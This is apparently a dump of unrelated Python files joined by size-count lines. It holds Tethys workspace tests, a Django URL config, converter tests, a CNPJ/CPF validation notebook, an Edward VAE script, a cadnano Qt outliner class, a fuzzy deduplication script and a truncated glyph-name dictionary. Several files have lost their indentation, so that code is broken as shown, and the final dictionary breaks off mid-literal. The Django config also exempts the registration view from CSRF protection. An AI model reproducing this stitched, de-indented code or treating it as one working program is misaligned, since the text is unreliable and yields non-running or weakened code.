# Create new folder inside test_workspace
base_workspace.TethysWorkspace(path=self.test_root_a)
# Create new folder test_workspace2
base_workspace.TethysWorkspace(path=self.test_root2)
self.assertEqual(result.__repr__(), workspace)
self.assertEqual(result.path, self.test_root)
# Create Files
file_list = ['test1.txt', 'test2.txt']
for file_name in file_list:
# Create file
open(os.path.join(self.test_root, file_name), 'a').close()
# Test files with full path
result = base_workspace.TethysWorkspace(path=self.test_root).files(full_path=True)
for file_name in file_list:
self.assertIn(os.path.join(self.test_root, file_name), result)
# Test files without full path
result = base_workspace.TethysWorkspace(path=self.test_root).files()
for file_name in file_list:
self.assertIn(file_name, result)
# Test Directories with full path
result = base_workspace.TethysWorkspace(path=self.root).directories(full_path=True)
self.assertIn(self.test_root, result)
self.assertIn(self.test_root2, result)
# Test Directories without full path
result = base_workspace.TethysWorkspace(path=self.root).directories()
self.assertIn('test_workspace', result)
self.assertIn('test_workspace2', result)
self.assertNotIn(self.test_root, result)
self.assertNotIn(self.test_root2, result)
# Write to file
f = open(os.path.join(self.test_root, 'test2.txt'), 'w')
f.write('Hello World')
f.close()
# Test size greater than zero
workspace_size = base_workspace.TethysWorkspace(path=self.test_root).get_size()
self.assertTrue(workspace_size > 0)
# Test get size unit conversion
workspace_size_kb = base_workspace.TethysWorkspace(path=self.test_root).get_size('kb')
        self.assertEqual(workspace_size/1024, workspace_size_kb)
# Test Remove file
base_workspace.TethysWorkspace(path=self.test_root).remove('test2.txt')
# Verify that the file has been remove
self.assertFalse(os.path.isfile(os.path.join(self.test_root, 'test2.txt')))
# Test Remove Directory
base_workspace.TethysWorkspace(path=self.root).remove(self.test_root2)
# Verify that the Directory has been remove
self.assertFalse(os.path.isdir(self.test_root2))
# Test Clear
base_workspace.TethysWorkspace(path=self.test_root).clear()
# Test size equal to zero
workspace_size = base_workspace.TethysWorkspace(path=self.test_root).get_size()
self.assertTrue(workspace_size == 0)
# Verify that the Directory has been remove
self.assertFalse(os.path.isdir(self.test_root_a))
# Verify that the File has been remove
self.assertFalse(os.path.isfile(os.path.join(self.test_root, 'test1.txt')))
# Test don't allow overwriting the path property
workspace = base_workspace.TethysWorkspace(path=self.test_root)
workspace.path = 'foo'
self.assertEqual(self.test_root, workspace.path)
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_user_workspace(self, mock_tws):
user = self.user
_get_user_workspace(self.app, user)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('user_workspaces', rts_call_args[0][0][0])
self.assertIn(user.username, rts_call_args[0][0][0])
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_user_workspace_http(self, mock_tws):
from django.http import HttpRequest
request = HttpRequest()
request.user = self.user
_get_user_workspace(self.app, request)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('user_workspaces', rts_call_args[0][0][0])
self.assertIn(self.user.username, rts_call_args[0][0][0])
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_user_workspace_none(self, mock_tws):
_get_user_workspace(self.app, None)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('user_workspaces', rts_call_args[0][0][0])
self.assertIn('anonymous_user', rts_call_args[0][0][0])
def test_get_user_workspace_error(self):
with self.assertRaises(ValueError) as context:
_get_user_workspace(self.app, 'test')
        self.assertEqual(
"Invalid type for argument 'user': must be either an User or HttpRequest object.", str(context.exception))
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_app_workspace(self, mock_tws):
_get_app_workspace(self.app)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('app_workspace', rts_call_args[0][0][0])
self.assertNotIn('user_workspaces', rts_call_args[0][0][0])
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_user_workspace')
def test_user_workspace_user(self, mock_guw, _, mock_rq, mock_log):
user_workspace = mock.MagicMock()
mock_guw.return_value = user_workspace
mock_rq.objects.get.return_value = mock.MagicMock(codename='user_workspace_quota')
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
ret = user_dec_controller(mock_request)
self.assertEqual(user_workspace, ret)
self.assertEqual(0, len(mock_log.warning.call_args_list))
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_user_workspace')
def test_user_workspace_rq_does_not_exist(self, _, __, mock_rq, mock_log):
mock_rq.objects.get.side_effect = ResourceQuota.DoesNotExist
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
user_dec_controller(mock_request)
mock_log.warning.assert_called_with('ResourceQuota with codename user_workspace_quota does not exist.')
def test_user_workspace_no_HttpRequest(self):
mock_request = mock.MagicMock()
ret = None
with self.assertRaises(ValueError) as context:
ret = user_dec_controller(mock_request)
self.assertTrue(
'No request given. The user_workspace decorator only works on controllers.' in str(context.exception))
self.assertEqual(None, ret)
@mock.patch('tethys_apps.base.workspace.passes_quota')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_user_workspace')
def test_user_workspace_passes_quota_false(self, _, mock_app, mock_rq, mock_pq):
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_rq.objects.get.return_value = mock.MagicMock(help='helpful message')
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
mock_pq.return_value = False
ret = None
with self.assertRaises(PermissionDenied) as context:
ret = user_dec_controller(mock_request)
self.assertTrue("helpful message" in str(context.exception))
self.assertEqual(None, ret)
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_app_workspace')
def test_app_workspace_app(self, mock_gaw, _, mock_rq, mock_log):
app_workspace = mock.MagicMock()
mock_gaw.return_value = app_workspace
mock_rq.objects.get.return_value = mock.MagicMock(codename='app_workspace_quota')
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
ret = app_dec_controller(mock_request)
self.assertEqual(app_workspace, ret)
self.assertEqual(0, len(mock_log.warning.call_args_list))
@mock.patch('tethys_quotas.utilities.log')
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_app_workspace')
def test_app_workspace_rq_does_not_exist(self, _, __, mock_rq, mock_log, ___):
mock_rq.objects.get.side_effect = ResourceQuota.DoesNotExist
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
app_dec_controller(mock_request)
mock_log.warning.assert_called_with('ResourceQuota with codename app_workspace_quota does not exist.')
def test_app_workspace_no_HttpRequest(self):
mock_request = mock.MagicMock()
ret = None
with self.assertRaises(ValueError) as context:
ret = app_dec_controller(mock_request)
self.assertTrue(
'No request given. The app_workspace decorator only works on controllers.' in str(context.exception))
self.assertEqual(None, ret)
@mock.patch('tethys_apps.base.workspace.passes_quota')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_app_workspace')
def test_app_workspace_passes_quota_false(self, _, mock_app, mock_rq, mock_pq):
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_rq.objects.get.return_value = mock.MagicMock(help='helpful message')
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
mock_pq.return_value = False
ret = None
with self.assertRaises(PermissionDenied) as context:
ret = app_dec_controller(mock_request)
self.assertTrue("helpful message" in str(context.exception))
self.assertEqual(None, ret)
| 12,233 | 4,098 |
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from .views import UserView, RegisterUser, LoginUser, LogoutUser, \
CheckAuthenticated
urlpatterns = [
path('', UserView.as_view()),
path('register', csrf_exempt(RegisterUser.as_view())),
path('login', LoginUser.as_view()),
path('logout', LogoutUser.as_view()),
path('isAuthenticated', CheckAuthenticated.as_view())
]
| 425 | 137 |
# -*- coding: utf-8 -*-
from pip_benchmark_python.utilities.Converter import Converter
class TestConverter:
def test_long_to_string(self):
assert Converter.long_to_string(None) is None
assert '123' == Converter.long_to_string(123)
def test_string_to_long(self):
assert 0 == Converter.string_to_long(None, 0)
assert 0 == Converter.string_to_long('ABC', 0)
assert 123 == Converter.string_to_long('123', 0)
def test_double_to_string(self):
assert Converter.double_to_string(None) is None
assert '123.456' == Converter.double_to_string(123.456)
def test_string_to_double(self):
assert 0 == Converter.string_to_double(None, 0)
assert 0 == Converter.string_to_double('ABC', 0)
assert 123.456 == Converter.string_to_double('123.456', 0)
def test_boolean_to_string(self):
assert 'false' == Converter.boolean_to_string(None)
assert 'true' == Converter.boolean_to_string(True)
def test_string_to_boolean(self):
assert False is Converter.string_to_boolean(None, False)
assert True is Converter.string_to_boolean('True', False)
assert True is Converter.string_to_boolean('1', False)
assert True is Converter.string_to_boolean('T', False)
| 1,287 | 450 |
# coding: utf-8
# # Invalid CNPJ or CPF
#
# `cnpj_cpf` is the column identifying the company or individual who received the payment made by the congressperson. Having this value empty should mean that it's an expense made outside Brazil, with a company (or person) without a Brazilian ID.
# In[1]:
import numpy as np
import pandas as pd
dataset = pd.read_csv('../data/2016-11-19-reimbursements.xz',
dtype={'applicant_id': np.str,
'cnpj_cpf': np.str,
'congressperson_id': np.str,
'subquota_number': np.str},
low_memory=False)
dataset.shape
# In[2]:
from pycpfcnpj import cpfcnpj
def validate_cnpj_cpf(cnpj_or_cpf):
    return (cnpj_or_cpf is None) | cpfcnpj.validate(cnpj_or_cpf)
cnpj_cpf_list = dataset['cnpj_cpf'].astype(np.str).replace('nan', None)
dataset['valid_cnpj_cpf'] = np.vectorize(validate_cnpj_cpf)(cnpj_cpf_list)
# `document_type` 2 means expenses made abroad.
# In[3]:
keys = ['year',
'applicant_id',
'document_id',
'total_net_value',
'cnpj_cpf',
'supplier',
'document_type']
dataset.query('document_type != 2').loc[~dataset['valid_cnpj_cpf'], keys]
# With 1,532,491 records in the dataset and just 10 with an invalid CNPJ/CPF, we can probably assume that the Chamber of Deputies validates this field in the tool where congresspeople request reimbursements; the ten remaining records most likely slipped through as mistakes in that validation.
# In[ ]:
| 1,541 | 540 |
#!/usr/bin/env python
"""
Convolutional variational auto-encoder for MNIST data. The model is
written in TensorFlow, with neural networks using Pretty Tensor.
Probability model
Prior: Normal
Likelihood: Bernoulli parameterized by convolutional NN
Variational model
Likelihood: Mean-field Normal parameterized by convolutional NN
"""
from __future__ import print_function
import os
import edward as ed
import prettytensor as pt
import tensorflow as tf
from convolutional_vae_util import deconv2d
from edward import Variational, Normal
from progressbar import ETA, Bar, Percentage, ProgressBar
from scipy.misc import imsave
from tensorflow.examples.tutorials.mnist import input_data
flags = tf.flags
logging = tf.logging
flags.DEFINE_integer("num_vars", 10, "Number of latent variables.")
flags.DEFINE_integer("n_iter_per_epoch", 1000, "Number of iterations per epoch.")
flags.DEFINE_integer("n_epoch", 100, "Maximum number of epochs.")
flags.DEFINE_integer("n_data", 128, "Mini-batch size for data subsampling.")
flags.DEFINE_string("data_directory", "data/mnist", "Directory to store data.")
flags.DEFINE_string("img_directory", "img", "Directory to store sampled images.")
FLAGS = flags.FLAGS
def mapping(self, x):
"""
lambda = phi(x)
"""
with pt.defaults_scope(activation_fn=tf.nn.elu,
batch_normalize=True,
learned_moments_update_rate=0.0003,
variance_epsilon=0.001,
scale_after_normalization=True):
params = (pt.wrap(x).
reshape([FLAGS.n_data, 28, 28, 1]).
conv2d(5, 32, stride=2).
conv2d(5, 64, stride=2).
conv2d(5, 128, edges='VALID').
dropout(0.9).
flatten().
fully_connected(self.num_vars * 2, activation_fn=None)).tensor
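        # The final layer emits 2 * num_vars values per example: the first half is
        # interpreted as the mean, the second half as a log-variance (hence the
        # sqrt(exp(.)) below).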
mean = params[:, :self.num_vars]
stddev = tf.sqrt(tf.exp(params[:, self.num_vars:]))
return [mean, stddev]
def sample_noise(self, size):
"""
eps = sample_noise() ~ s(eps)
s.t. z = reparam(eps; lambda) ~ q(z | lambda)
"""
return tf.random_normal(size)
Normal.mapping = mapping
Normal.sample_noise = sample_noise
class NormalBernoulli:
def __init__(self, num_vars):
self.num_vars = num_vars
def mapping(self, z):
"""
p = varphi(z)
"""
with pt.defaults_scope(activation_fn=tf.nn.elu,
batch_normalize=True,
learned_moments_update_rate=0.0003,
variance_epsilon=0.001,
scale_after_normalization=True):
return (pt.wrap(z).
reshape([FLAGS.n_data, 1, 1, self.num_vars]).
deconv2d(3, 128, edges='VALID').
deconv2d(5, 64, edges='VALID').
deconv2d(5, 32, stride=2).
deconv2d(5, 1, stride=2, activation_fn=tf.nn.sigmoid).
flatten()).tensor
def log_likelihood(self, x, z):
"""
log p(x | z) = log Bernoulli(x | p = varphi(z))
"""
p = self.mapping(z)
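        # The 1e-8 offsets below guard against log(0) when the decoder output
        # saturates at exactly 0 or 1.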
return x * tf.log(p + 1e-8) + (1.0 - x) * tf.log(1.0 - p + 1e-8)
def sample_prior(self, size):
"""
p ~ some complex distribution induced by
z ~ N(0, 1), p = phi(z)
"""
z = tf.random_normal(size)
return self.mapping(z)
class Data:
def __init__(self, data):
self.mnist = data
def sample(self, size):
        x_batch, _ = self.mnist.train.next_batch(size)
return x_batch
ed.set_seed(42)
model = NormalBernoulli(FLAGS.num_vars)
# TODO This family is not currently amenable to the variational construction.
variational = Normal(FLAGS.num_vars)
if not os.path.exists(FLAGS.data_directory):
os.makedirs(FLAGS.data_directory)
mnist = input_data.read_data_sets(FLAGS.data_directory, one_hot=True)
data = Data(mnist)
inference = ed.VAE(model, variational, data)
sess = inference.initialize(n_data=FLAGS.n_data)
with tf.variable_scope("model", reuse=True) as scope:
p_rep = model.sample_prior([FLAGS.n_data, FLAGS.num_vars])
for epoch in range(FLAGS.n_epoch):
avg_loss = 0.0
widgets = ["epoch #%d|" % epoch, Percentage(), Bar(), ETA()]
pbar = ProgressBar(FLAGS.n_iter_per_epoch, widgets=widgets)
pbar.start()
for t in range(FLAGS.n_iter_per_epoch):
pbar.update(t)
loss = inference.update(sess)
avg_loss += loss
# Take average of all ELBOs during the epoch.
avg_loss = avg_loss / FLAGS.n_iter_per_epoch
# Take average over each data point (pixel), where each image has
# 28*28 pixels.
avg_loss = avg_loss / (28 * 28 * FLAGS.n_data)
# Print a lower bound to the average marginal likelihood for a single pixel.
print("log p(x) >= %f" % avg_loss)
imgs = sess.run(p_rep)
for b in range(FLAGS.n_data):
if not os.path.exists(FLAGS.img_directory):
os.makedirs(FLAGS.img_directory)
imsave(os.path.join(FLAGS.img_directory, '%d.png') % b,
imgs[b].reshape(28, 28))
| 5,170 | 1,790 |
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QTreeWidgetItem
from cadnano.gui.palette import getBrushObj
from . import outlinerstyles as styles
NAME_COL = 0
LOCKED_COL = 1
VISIBLE_COL = 2
COLOR_COL = 3
LEAF_FLAGS = (Qt.ItemIsSelectable | Qt.ItemIsEditable |
Qt.ItemIsDragEnabled |
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled) # 55 + 8 = 63
DISABLE_FLAGS = Qt.NoItemFlags # 0
ROOT_FLAGS = ( Qt.ItemIsDragEnabled | Qt.ItemIsDropEnabled |
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled ) # 60
class CNOutlinerItem(QTreeWidgetItem):
PROPERTIES = {'name': NAME_COL, 'is_locked': LOCKED_COL, 'is_visible': VISIBLE_COL, 'color': COLOR_COL}
CAN_NAME_EDIT = True
def __init__(self, cn_model, parent):
super(QTreeWidgetItem, self).__init__(parent, QTreeWidgetItem.UserType)
self._cn_model = cn_model
name = cn_model.getName()
color = cn_model.getColor()
self.setData(NAME_COL, Qt.EditRole, name)
        self.setData(LOCKED_COL, Qt.EditRole, False)  # is_locked
self.setData(VISIBLE_COL, Qt.EditRole, True) # is_visible
self.setData(COLOR_COL, Qt.EditRole, color)
# end def
### PRIVATE SUPPORT METHODS ###
def __hash__(self):
""" necessary as CNOutlinerItem as a base class is unhashable
but necessary due to __init__ arg differences for whatever reason
"""
return hash(self._cn_model)
### PUBLIC SUPPORT METHODS ###
def itemType(self):
pass
# end def
def cnModel(self):
return self._cn_model
# end def
def getColor(self):
return self._cn_model.getProperty('color')
# end def
def createRootPartItem(self, item_name, parent):
""" use this for sub-lists for part items
"""
return RootPartItem(self._cn_model, item_name, parent)
# end def
def updateCNModel(self):
# this works only for color. uncomment below to generalize to properties
# print("outliner %s - updateCNModel" % (str(type(self))))
cn_model = self._cn_model
name = self.data(NAME_COL, Qt.DisplayRole)
color = self.data(COLOR_COL, Qt.DisplayRole)
is_visible = self.data(VISIBLE_COL, Qt.DisplayRole)
mname, mcolor, mvisible = cn_model.getOutlineProperties()
if name is not None and name != mname:
cn_model.setProperty('name', name)
if color is not None and color != mcolor:
cn_model.setProperty('color', color)
if is_visible is not None and is_visible != mvisible:
cn_model.setProperty('is_visible', is_visible)
# end def
def setValue(self, key, value):
# cn_model = self._model_part
if key == 'name':
name = self.data(NAME_COL, Qt.DisplayRole)
if name != value:
# print("setting name", self.isSelected())
self.setData(NAME_COL, Qt.EditRole, value)
elif key == 'color':
color = self.data(COLOR_COL, Qt.DisplayRole)
if color != value:
self.setData(COLOR_COL, Qt.EditRole, value)
elif key == 'is_locked':
is_locked = self.data(LOCKED_COL, Qt.DisplayRole)
if is_locked != value:
self.setData(LOCKED_COL, Qt.EditRole, value)
elif key == 'is_visible':
is_visible = self.data(VISIBLE_COL, Qt.DisplayRole)
if is_visible != value:
self.setData(VISIBLE_COL, Qt.EditRole, value)
else:
"property not supported"
# pass
# raise KeyError("No property %s in cn_model" % (key))
# end def
def activate(self):
self.setBackground(NAME_COL, getBrushObj(styles.ACTIVE_COLOR))
self.is_active = True
# end def
def deactivate(self):
# print("should deactivate outliner Part")
self.setBackground(NAME_COL, getBrushObj(styles.INACTIVE_COLOR))
self.is_active = False
# end def
# end class
class RootPartItem(QTreeWidgetItem):
def __init__(self, model_part, item_name, parent):
super(QTreeWidgetItem, self).__init__(parent, QTreeWidgetItem.UserType)
self._cn_model = model_part
self.item_name = item_name
self.setData(NAME_COL, Qt.EditRole, item_name)
self.setData(LOCKED_COL, Qt.EditRole, False) # is_locked
self.setData(VISIBLE_COL, Qt.EditRole, True) # is_visible
self.setData(COLOR_COL, Qt.EditRole, "#ffffff") # color
# self.setFlags(self.flags() & ~Qt.ItemIsSelectable)
self.setFlags(ROOT_FLAGS)
self.setExpanded(True)
# end def
def __repr__(self):
return "RootPartItem %s: for %s" % (self.item_name,
self._cn_model.getProperty('name'))
# end def
def part(self):
return self._cn_model
def getColor(self):
return "#ffffff"
| 4,998 | 1,602 |
import pandas as pd
import re
from fuzzywuzzy import fuzz
from tqdm import tqdm
from datetime import date
import os
#os.chdir("C:\\Users\\lm16564\\OneDrive - University of Bristol\\Documents\\rrr\\COVID_suicide_living")
def fuzzymatch(a, b, min_match):
    if fuzz.ratio(a, b) > min_match:  # match is greater than the specified ratio
# print("-------match to {} ratio---------".format(min_match))
# print(a)
# print(b)
# print(fuzz.ratio(a, b))
return True
return False # match is less, therefore text is too different
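# Illustrative note (not from the original script): fuzz.ratio is a 0-100 similarity
# score, so e.g. fuzzymatch("covid and suicide", "covid & suicide", 80) is expected
# to return True, while two unrelated titles score well below 80 and return False.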
def rowmatch(row, indexes, mydict, min_match_title, min_match_abstrct):
try:
t1 = row["title"].strip().lower() # remove trailing spaces and lower the letters
if t1=="":
return False, None
except:
return False, None
try:
a1 = row["abstract"].strip().lower()[:495]
except:
a1 = ""
match = False
index = None # save location of the duplicate in master df
if t1 != "": # only attempt matching if there is a title to start with.
for i in indexes: # attempt to match this title with every title in the master frame
try:
t2 = mydict["title"][i].strip().lower() # remove trailing spaces and lower the letters
except:
t2 = ""
match = fuzzymatch(t1, t2, min_match_title)
if match: # continue only if titles are matching
if a1 != "":
try:
a2 = mydict["abstract"][i].strip().lower()[:495]
except:
a2 = ""
# print("matched title but found no second abstract")
# print(t1)
# print(t2)
index = i
break
match = fuzzymatch(a1, a2, min_match_abstrct)
if match:
# print("Matched on full record")
# print(t1)
# print(t2)
# print(a1)
# print(a2)
index = i
break
else:
index = None
else:
# print("Matched title, but found no first abstract, returning True")#for e.g. dblp records there are no abstracts, but we still want to deduplicate and get rid of them!
# print(t1)
# print(t2)
# print("-------")
index = i
break
return match, index # is true if match was found and loop broken. Is false if all rows were checked and fuzzy matching was below the threshold
def dedupe_loop_within(wos, name, min_match_title, min_match_abstract):
wos_orig = wos.copy()
wos_orig["Deduplication_Notes"] = ["" for d in wos_orig["title"].values] # has no abstracts
orig_length = wos.shape[0]
print("Deduplicating {} data".format(name))
new_rows = []
counter = 0
masterdf = pd.DataFrame(columns=wos.columns.values)
#
disagreements=[]
all_dupes=[]
pd.set_option("display.max_colwidth", 5000)
with tqdm(total=wos.shape[0]) as pbar:
for i, row in wos.iterrows():
mydict = masterdf.to_dict()
indexes = list(masterdf.index.values) # iterate over dict rather than df for 6 times speedup!
match, index = rowmatch(row, indexes, mydict, min_match_title, min_match_abstract)
if match:
all_dupes.append(row)
all_dupes.append(masterdf.loc[index])
# print(index)
# print(masterdf.at[index, "Deduplication_Notes"])
init1=False
init2=False
if row["initial_decision"] == "Include" or pd.notna(row["expert_decision"]):
init1=True
if masterdf.loc[index]["initial_decision"] == "Include" or pd.notna(masterdf.loc[index]["expert_decision"]):
init2 = True
if init1 != init2:
#print("Mismatch!")
disagreements.append(row)
disagreements.append(masterdf.loc[index])
# wos_orig.at[i, "Deduplication_Notes"] = "{} CHECK DUPLICATE STATUS [SOURCE:{} {}]".format(
# str(wos_orig.at[index, "Deduplication_Notes"]), str(masterdf.loc[index]["source"]),
# re.sub(r"\s+", " ",
# masterdf.loc[index].to_string().replace("\n", "; "))).strip() # modift masterdf in place
# print(masterdf.at[index, "Deduplication_Notes"])
counter += 1
else:
masterdf = masterdf.append(row, ignore_index=True)
# print(masterdf.head())
pbar.update(1)
print(
"Adding {} rows out of {} to master data and identified {} as duplicates".format(masterdf.shape[0], orig_length,
counter))
print("Writing disagreements...")
dis=pd.DataFrame(disagreements, columns=wos.columns.values)
dis.to_csv("data//results//disagreements.csv")
print("Writing full deduplication of previous data frame (danger!)...")
dis = pd.DataFrame(all_dupes, columns=wos.columns.values)
dis.to_csv("data//results//dupes_previous.csv")
# masterdf.to_csv("all_results.csv")
# wos_orig.to_csv( "all_results_with_duplicates-{}.csv".format(date.today())) # save version that has dupes in it
# masterdf.to_csv(os.path.join("results", "all_results.csv"))
# wos_orig.to_csv(os.path.join("results", "all_results_with_duplicates-{}.csv".format(
# date.today()))) # save version that has dupes in it
return masterdf
def dedupe_loop_additional(original, new, name, min_match_title, min_match_abstract):
#
    #Loop over the new data and append rows only if they are not already duplicates of rows in the master data frame.
    #Also store duplicates in a deduplication master list, unless they are exact replicas of a previously recorded duplicate.
#
#
print("Deduping additional dataframe")
new_rows = []
counter = 0
equals=0
masterdf = original.copy()
new_deduped=pd.DataFrame(columns=list(new.columns))
#
dupe_list=[]
new=new.fillna("")
masterdf = masterdf.fillna("")
pd.set_option("display.max_colwidth", 5000)#otherwise cell contents are cut away
print("Iterating {} rows of new data to find duplicates".format(new.shape[0]))
with tqdm(total=new.shape[0]) as pbar:
for i, row in new.iterrows():
mydict = masterdf.to_dict()
indexes = list(masterdf.index.values) # iterate over dict rather than df for 6 times speedup!
# print(row.to_string())
match, index = rowmatch(row, indexes, mydict, min_match_title, min_match_abstract)
if match:
def dupe_report(new, orig):
id=orig["ID"]
source_orig = str(orig["source"]).lower()
source_new = str(new["source"]).lower()
title_orig=str(orig["title"]).strip()
title_new = str(new["title"]).strip()
abstract_new = str(new["abstract"]).strip()
abstract_orig = str(orig["abstract"]).strip()
author_new = str(new["authors"]).strip()
author_orig = str(orig["authors"]).strip()
link_new = str(new["link"]).strip()
link_orig = str(orig["link"]).strip()
date_added=date.today()
#decision_orig=orig["initial_decision"]
if id== "nan" or id =="NaN" or id == "" or pd.isna(id) or id == "NA":#do not append this value, its already added to the new results, but has no ID assigned yet.
return "equal"
if source_new == source_orig and title_new == title_orig and abstract_new == abstract_orig and link_new == link_orig:#exact duplicates are not needed
#print("Direct duplicate: {} {}; {} {}; {} {}".format(source_orig,source_new,link_orig,link_new,title_orig,title_new))
return "equal"
else:
return pd.Series([id,source_orig,source_new,title_orig,title_new,abstract_orig,abstract_new,author_orig,author_new,link_orig,link_new, date_added], index=["ID","source original", "source new", "title original","title new","abstract original","abstract new","author original","author new","link original","link new", "date added"])
ret= dupe_report(row, masterdf.loc[index])
if type(ret) == pd.Series:
dupe_list.append(ret)#add a duplication report to the list
counter += 1
else:
equals += 1
else:
masterdf = masterdf.append(row, ignore_index=True)#add new entry to master data becasue it is not a duplicate
new_deduped = new_deduped.append(row, ignore_index=True)#add new entry to a data fram that just consists of new entries
# print(masterdf.head())
pbar.update(1)
print("Adding {} rows out of {} to master data and identified {} as duplicates with minor differences (the other {} were exactly identical and are discarded)".format(new_deduped.shape[0], new.shape[0],counter, equals))
print("Replacing NA with empty spaces...")
new_deduped= new_deduped.fillna("")
new_deduped['link'] = new_deduped['link'].apply(lambda x: re.sub("https://www.doi.org", "https://doi.org", x))
new_deduped.to_csv(name)
print("Saved the new, deduplicated rows as {}".format(name))
#################Deduplication report: append new duplicates to it
dup_df=pd.read_csv("data\\results\\dedupe_report.csv")
dup_df=dup_df.replace("NA", "")
dup_df = dup_df.fillna("")
counter=0
#print(len(dupe_list))
print("Checking if any new results need to be added to the deduplication master list:")
with tqdm(total=len(dupe_list)) as pbar:
for e in dupe_list:
dup_df = dup_df.fillna("")
ddf= dup_df[(dup_df['ID']==e[0]) & (dup_df['source original'] == e[1]) & (dup_df['source new'] == e[2]) & (dup_df['abstract new'] == e[6]) & (dup_df['title new'] == e[4])]
if ddf.shape[0]== 0:#checking if this record is already stored as duplicate - since many records are retrieved over and over again
dup_df = dup_df.append(e, ignore_index=True)
counter += 1
# print("found new: {}".format(e[0]))
# print("Test: {}".format(dup_df[dup_df['ID']==e[0]].shape[0]))
# print(e[0])
# print(dup_df['ID'].values[:100])
#else:
#print("Duplicate in dup_df")
pbar.update(1)
dup_df.to_csv("data\\results\\dedupe_report.csv",index=False)
print("Added {} records to the dedupe_report.csv".format(counter))
def dedupe_me(path, match_title, match_abstract, path_2=""):
df = pd.read_csv(path)
df = df.replace("NA", "")
df = df.replace("nan", "")
df= df.fillna("")
print("Reading the file all_results_tmp.csv that contains the previous results. It has {} records, and its {} column names are {}".format(df.shape[0], len(list(df.columns)), list(df.columns)))
if path_2 != "":
df_toadd = pd.read_csv(path_2)
df_toadd = df_toadd.replace("NA", "")
df_toadd = df_toadd.replace("nan", "")
df_toadd = df_toadd.fillna("")
print("Reading the file new_results.csv that contains the new results. It has {} records, and its {} column names are {}".format(df_toadd.shape[0], len(list(df.columns)), list(df_toadd.columns)))
dedupe_loop_additional(df, df_toadd, "data\\results\\new_and_deduped.csv", match_title, match_abstract)
else:
        #use this to deduplicate results within one single spreadsheet - not needed for LSR app since deduplication happens based on a deduplicated database + newly added records
dedupe_loop_within(df, "data\\results\\new_and_deduped.csv", match_title, match_abstract)
path = "data\\results\\all_results_tmp.csv"#is previous results but with some replacements
path_new = "data\\results\\new_results.csv"
if not os.path.exists("data\\results\\dedupe_report.csv"):
dupes=pd.DataFrame(columns=["ID","source original", "source new","title original","title new","abstract original","abstract new","author original","author new","link original","link new", "date added"])
dupes.to_csv("data\\results\\dedupe_report.csv",index=False)
#Alternative: if you have problems with relative and absolute paths, the os module can grab the current working directory's absolute path (os.getcwd()).
dedupe_me(path, 95, 90, path_new) # use this when adding data. creates the file "results/all_results_updated.csv"
#
#Code below to find screener conflicts and total number of previous duplicates. Note: need to retain column 'initial_decision' from all_results in order to run this code!
#
# print("Finding screener-conflicts within all_results_tmp.csv...")
# wos=pd.read_csv("data\\results\\all_results_tmp.csv")
# dedupe_loop_within(wos, "data\\results\\new_and_deduped.csv", 95, 90)
| 13,579 | 4,090 |
#Move to class variable of Glyph object
idDict = {0:'exclam', 1:'quotedbl', 2:'numbersign', 3:'dollar',
4:'percent', 5:'ampersand', 6:'quotesingle', 7:'parenleft',
8:'parenright', 9:'asterisk', 10:'plus', 11:'comma',
12:'hyphen', 13:'period', 14:'slash', 15:'zero',
16:'one', 17:'two', 18:'three', 19:'four',
20:'five', 21:'six', 22:'seven', 23:'eight',
24:'nine', 25:'colon', 26:'semicolon', 27:'less',
28:'equal', 29:'greater', 30:'question', 31:'at',
32:'A', 33:'B', 34:'C', 35:'D',
36:'E', 37:'F', 38:'G', 39:'H',
40:'I',41:'J', 42:'K', 43:'L',
44:'M', 45:'N', 46:'O', 47:'P',
48:'Q', 49:'R', 50:'S', 51:'T',
52:'U', 53:'V', 54:'W', 55:'X',
56:'Y', 57:'Z', 58:'bracketleft', 59:'backslash',
60:'bracketright', 61:'asciicircum', 62:'underscore', 63:'grave',
64:'a', 65:'b', 66:'c', 67:'d',
